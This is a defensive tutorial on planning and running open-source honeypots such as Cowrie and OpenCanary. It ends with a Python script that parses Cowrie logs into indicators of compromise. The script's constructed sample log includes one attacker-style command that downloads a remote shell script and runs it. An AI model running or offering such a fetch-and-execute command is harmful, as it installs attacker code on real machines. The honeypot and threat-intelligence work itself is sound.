Why run honeypots
Honeypots give you a controlled window into attacker behavior. They let you collect brute force attempts, shell sessions, malware payloads, scanner fingerprints, credential lists, and IOCs that are difficult to obtain from passive network telemetry alone. Use them for context-enriched threat intelligence, rapid detection rule development, and to test defenses against real tactics seen in the wild.
Plan before you deploy
Start with objectives. Ask what you want to learn. Are you hunting internet-wide opportunistic scanners and malware droppers, profiling targeted attackers, or monitoring lateral movement inside a corporate network? Your objectives determine the honeypot interaction level you need: low interaction for broad coverage and low resource cost, medium interaction to capture command sequences, and high interaction when you need full forensic detail. The Honeynet Project has a helpful conceptual breakdown of these trade-offs.
Choose the right open-source tools
Pick widely used projects with active communities. A few practical, battle-tested choices are:
- Cowrie: a medium to high interaction SSH and Telnet honeypot that records session transcripts and saves transferred files. It is easy to run in Docker for quick experiments or install from source when you want custom configuration and deeper logging.
- Dionaea: a malware capturing honeypot that emulates vulnerable services to collect binaries and shellcode. Use it when you want to capture exploit attempts and downloadable payloads across multiple protocols.
- OpenCanary: a lightweight, multi-protocol honeypot you can run on endpoints or small VMs to detect internal compromise after a breach. It is easy to install and configure, and it alerts via multiple transports.
- MHN or T-Pot: if you plan to run many sensors, use a management and collection platform to centralize deployment, event ingestion, and dashboards. MHN provides deploy scripts and supports hpfeeds-style aggregation. T-Pot bundles multiple honeypots and management tooling for an appliance-like deployment.
Design the deployment architecture
Keep three basic principles in mind: isolation, logging, and scale.
- Isolation: never place honeypots on your production VLAN without strict controls. Use a segmented honeynet or cloud VMs to avoid cross-contamination. A honeywall or equivalent gateway concept helps control egress and capture metadata.
- Logging and forwarding: configure JSON or structured logs and forward events to a central collector or SIEM. Most honeypots support JSON logging or hpfeeds integration; central collection simplifies correlation and threat intel extraction.
- Scale: start small with one or two sensors. After you validate data quality, scale using automated deploy scripts or orchestration. MHN and T-Pot provide mechanisms to deploy many sensors and aggregate results.
Quick practical example 1 — Cowrie with Docker (fast path)
- Provision a small cloud VM rather than exposing your home network. Ubuntu or Debian works well. Use a single public IP for the sensor.
- Run Cowrie via Docker to get a working sensor fast:
  $ docker run -p 2222:2222 cowrie/cowrie:latest
- Customize by mounting a config directory and a persistent volume for logs and downloads. Cowrie saves downloaded files and session logs, which you should collect for analysis. For production-style setups, use a git clone of the project and edit etc/cowrie.cfg.
Quick practical example 2 — OpenCanary for internal endpoint deception
- Install on a small Linux host or VM:
  $ pip install opencanary
- Create the initial config and enable the protocols you want to emulate:
  $ opencanaryd --copyconfig
  Edit /etc/opencanaryd/opencanary.conf to enable services and alert transports.
- Run opencanaryd as a low-privilege user and integrate alerts into your central alerting channel so that any internal interaction immediately triggers an investigation.
Centralize and correlate with MHN or similar
If you have multiple sensors, run a central server to collect hpfeeds or JSON events. MHN provides a web UI, deploy scripts for several sensors, and options to integrate with Splunk or other SIEMs. Use TLS and authentication tokens so sensors cannot be hijacked to exfiltrate data.
Handling captured artifacts and malware safely
Treat all captured payloads as malicious. Move them into an isolated analysis lab or dedicated malware sandbox. Maintain strict chain of custody and use hash lists and YARA rules to track recurrence. Do not execute captured binaries on production infrastructure. The Honeynet Project resources discuss containment and honeywall techniques for controlling risk.
Operational hygiene and detection tuning
- Monitor sensor health and uptime. Sensors frequently get noisy or saturated by scanners. Alert on abnormal spikes.
- Tune logging to balance fidelity and storage. Store raw session transcripts for a limited retention period and extract IOCs into long-term stores.
- Sanitize and anonymize where appropriate before sharing. If you publish IOCs, remove sensitive metadata and follow responsible disclosure norms.
Analysis workflows that pay off
- Extract command sequences from Cowrie sessions to build Sigma or YARA rules.
- Extract dropped binaries from Dionaea or Cowrie downloads and hash them. Compare against public malware feeds and publish internal indicators for blocking.
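An added example, not code from the page or from the Cowrie project, covering the logging and analysis workflow described above: it parses Cowrie's line-delimited JSON log, groups each session's credentials, ordered command sequence and downloads, and checks download hashes against a known-hash list to spot recurring payloads. The log lines are constructed samples, and the field names (eventid, src_ip, session, username, password, input, url, shasum) are assumed to match Cowrie's JSON output; verify them against your Cowrie version.

```python
import json
from collections import defaultdict

# Constructed sample of Cowrie line-delimited JSON log output (not a real capture).
# Field names are assumed to match Cowrie's JSON logger; verify against your version.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","session":"a1b2"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"a1b2","username":"root","password":"123456"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.7","session":"a1b2","username":"root","password":"admin"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1b2","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1b2","input":"cd /tmp; wget http://198.51.100.9/x.sh; chmod +x x.sh; ./x.sh"}
{"eventid":"cowrie.session.file_download","src_ip":"203.0.113.7","session":"a1b2","url":"http://198.51.100.9/x.sh","shasum":"CONSTRUCTED_SHA256_A"}
{"eventid":"cowrie.session.closed","src_ip":"203.0.113.7","session":"a1b2"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.44","session":"c3d4","username":"admin","password":"admin"}
this line is deliberately not JSON: real log files can contain such debris
"""

def parse_cowrie(log_text):
    """Parse line-delimited JSON events, skipping lines that are not valid JSON."""
    events = []
    for line in log_text.splitlines():
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # never let one bad line abort a whole batch
    return events

def extract_iocs(events, known_hashes=frozenset()):
    """Group events per session: credentials tried, ordered command sequence
    (raw material for Sigma/YARA rules) and downloads. Also returns the set of
    download hashes already present in known_hashes, i.e. recurring payloads."""
    sessions = defaultdict(lambda: {"src_ip": None, "creds": [], "commands": [], "downloads": []})
    for ev in events:
        s = sessions[ev.get("session")]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            s["creds"].append((ev.get("username"), ev.get("password"), eid.endswith("success")))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            s["downloads"].append({"url": ev.get("url"), "sha256": ev.get("shasum")})
    recurring = {d["sha256"] for s in sessions.values()
                 for d in s["downloads"] if d["sha256"] in known_hashes}
    return dict(sessions), recurring

if __name__ == "__main__":
    sessions, recurring = extract_iocs(parse_cowrie(SAMPLE_LOG), {"CONSTRUCTED_SHA256_A"})
    print(sessions)
    print("recurring payload hashes:", recurring)
```

Point parse_cowrie at the contents of Cowrie's cowrie.json log to run it on real sensor data; the per-session command lists are what you turn into Sigma rules, and the sha256 values are what you feed into your hash list and blocking indicators.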
Checklist before internet exposure
- Segment the honeypot network and implement egress controls.
- Ensure logs are forwarded to a central collector before exposing sensors.
- Confirm you have an isolated malware analysis environment for any binaries you collect.
- Apply rate limiting on management interfaces and use SSH keys for admin access, separate from honeypot credentials.
Next steps and growth path
Start with one Cowrie sensor and one OpenCanary instance to get familiar with logs and alerts. After you validate your ingestion and analysis pipeline, add Dionaea or a T-Pot appliance to capture wider protocol activity. When you have steady, reliable data, integrate those indicators into your detection engineering roadmap for lasting defensive value.
Final notes
Open-source honeypots give security teams a low-cost, high-signal source of threat intelligence when deployed carefully. The work is iterative. Instrument, learn, tune, and scale. Keep safety and legal considerations front and center and use centralized collection so your analysts can turn raw sessions into actionable detections and response playbooks.